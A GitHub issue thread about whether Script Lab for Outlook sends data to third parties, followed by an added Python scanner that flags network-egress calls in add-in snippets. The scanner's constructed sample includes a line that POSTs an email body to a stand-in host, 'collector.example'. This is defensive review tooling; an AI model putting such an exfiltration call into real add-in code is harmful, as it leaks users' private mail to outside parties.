OfficeDev / script-lab

Create, run and share your code directly from Office
MIT License
703 stars, 161 forks

AppSource Documentation Discrepancy and Clarity #1002

Closed Sotaur closed 1 year ago

Sotaur commented 1 year ago

On the AppSource pages for Script Lab, the flavor for Outlook calls out that it can send data to third parties, but the flavor for Word, Excel, and PowerPoint doesn't call that out. This creates a few questions:

  1. Is there any meaningful difference between the flavors, or is this purely a documentation issue?
  2. What default communication happens with third parties, if any, with Script Lab?
  3. Is there any way for administrators to control/restrict what scripts can call out to, such as with GPO? The general Office add-in security page doesn't note that, but it's unclear if Script Lab has additional controls available.
     a. If not, does Script Lab include unique (enough) headers/user agent/etc. that a corporate firewall could identify and separate requests from it?

Sotaur commented 1 year ago

Searching through the code nothing sticks out to me as hitting a third party other than the relatively obvious GitHub integration, but a lot of organizations (mine included) have sensitive information in email (e.g., PII, PHI, etc.) they don't want to risk leaking with a misstep in someone using this.

ElizabethSamuel-MSFT commented 1 year ago

@Sotaur Thanks for asking about this. My understanding is that Script Lab allows you as the developer to include calls in your code to external services. Therefore, such calls should be within your control and not a behavior required for Script Lab itself to function.

I'll see if we can refine that info in the add-in's description.

ElizabethSamuel-MSFT commented 1 year ago

@Sotaur To further clarify: the user is usually able to accept or reject changes made by their add-ins. However, with the introduction of Outlook features like append on send, the user may only see the final action after the email is sent. Script Lab for Outlook includes that text in the AppSource description because it supports these types of Outlook features. That support enables you to run existing Script Lab samples (e.g., Append text to item body on send) or create your own samples using those features.

In this case, the Script Lab samples that use these features don't call any external services. However, the description on AppSource is in place because any add-in that uses such features can include calls to external services. I encourage you to do similar due diligence with other such add-ins so you know what's being appended or prepended on send, for example, and can make an informed decision about the risk involved.

Thanks for your interest in Office Add-ins! I'll close this issue but let us know if you have any further questions.
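The thread turns on one practical point: an append-on-send snippet by itself moves no data off the machine, but any snippet a developer writes can add an outbound call, so the due diligence Elizabeth recommends comes down to reading the snippet for network egress before letting it run against mail that holds PII. The following Python script is an added example of that review step, written here for this discussion; it is not part of Script Lab and the sample snippet, the `collector.example` host and the allowlist are all constructed. It flags the JavaScript constructs that can send data out (`fetch`, `XMLHttpRequest`, `sendBeacon`, `WebSocket`) and any literal URL, and marks URLs whose host is on a reviewer-maintained allowlist (here the GitHub API the thread mentions as Script Lab's known integration).

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# JavaScript constructs that can carry data to a remote host.
EGRESS_PATTERNS = {
    "fetch": re.compile(r"\bfetch\s*\("),
    "XMLHttpRequest": re.compile(r"\bnew\s+XMLHttpRequest\b"),
    "sendBeacon": re.compile(r"\bnavigator\.sendBeacon\s*\("),
    "WebSocket": re.compile(r"\bnew\s+WebSocket\s*\("),
}
# Literal http(s) URLs; stops at whitespace or a closing quote/paren.
URL_PATTERN = re.compile(r"https?://[^\s'\"`)]+")


@dataclass
class Finding:
    line: int       # 1-based line in the snippet
    kind: str       # "fetch", "XMLHttpRequest", ..., or "url"
    detail: str     # the matched source line or URL
    allowed: bool   # True only for URLs whose host is on the allowlist


def find_egress(source, allowed_hosts=()):
    """Return every line of a JS snippet that could send data to a third party."""
    findings = []
    for lineno, text in enumerate(source.splitlines(), start=1):
        for kind, pattern in EGRESS_PATTERNS.items():
            if pattern.search(text):
                findings.append(Finding(lineno, kind, text.strip(), False))
        for url in URL_PATTERN.findall(text):
            host = urlparse(url).hostname or ""
            findings.append(Finding(lineno, "url", url, host in allowed_hosts))
    return findings


def has_unreviewed_egress(source, allowed_hosts=()):
    """True if the snippet contains any egress not covered by the allowlist."""
    return any(not f.allowed for f in find_egress(source, allowed_hosts))


# Constructed sample snippet (hypothetical; not a Script Lab sample). The
# appendOnSendAsync call is local to the mail item; the fetch on line 9 is the
# kind of addition a reviewer wants to catch before the snippet touches real mail.
SAMPLE_SNIPPET = """\
$("#run").click(run);
async function run() {
  Office.context.mailbox.item.body.appendOnSendAsync(
    "<p>Sent from a reviewed add-in</p>",
    { coercionType: Office.CoercionType.Html },
    (result) => console.log(result.status)
  );
  const body = await getBody();
  await fetch("https://collector.example/upload", { method: "POST", body });
}
"""

# Hosts the reviewer has already accepted (constructed allowlist).
ALLOWED_HOSTS = ("api.github.com",)

if __name__ == "__main__":
    for f in find_egress(SAMPLE_SNIPPET, ALLOWED_HOSTS):
        flag = "allowed" if f.allowed else "REVIEW"
        print(f"line {f.line}: {f.kind:<14} {flag:<8} {f.detail}")
    print("unreviewed egress:", has_unreviewed_egress(SAMPLE_SNIPPET, ALLOWED_HOSTS))
```

A pattern scan like this is a first pass, not a proof: it will miss calls built from string concatenation or routed through a library, so a snippet that passes still deserves a look at what `getBody()`-style helpers actually do. It does answer the narrower question in the thread cheaply, namely whether a given sample uses only the Office.js item APIs or also reaches out to a host the organization has not reviewed.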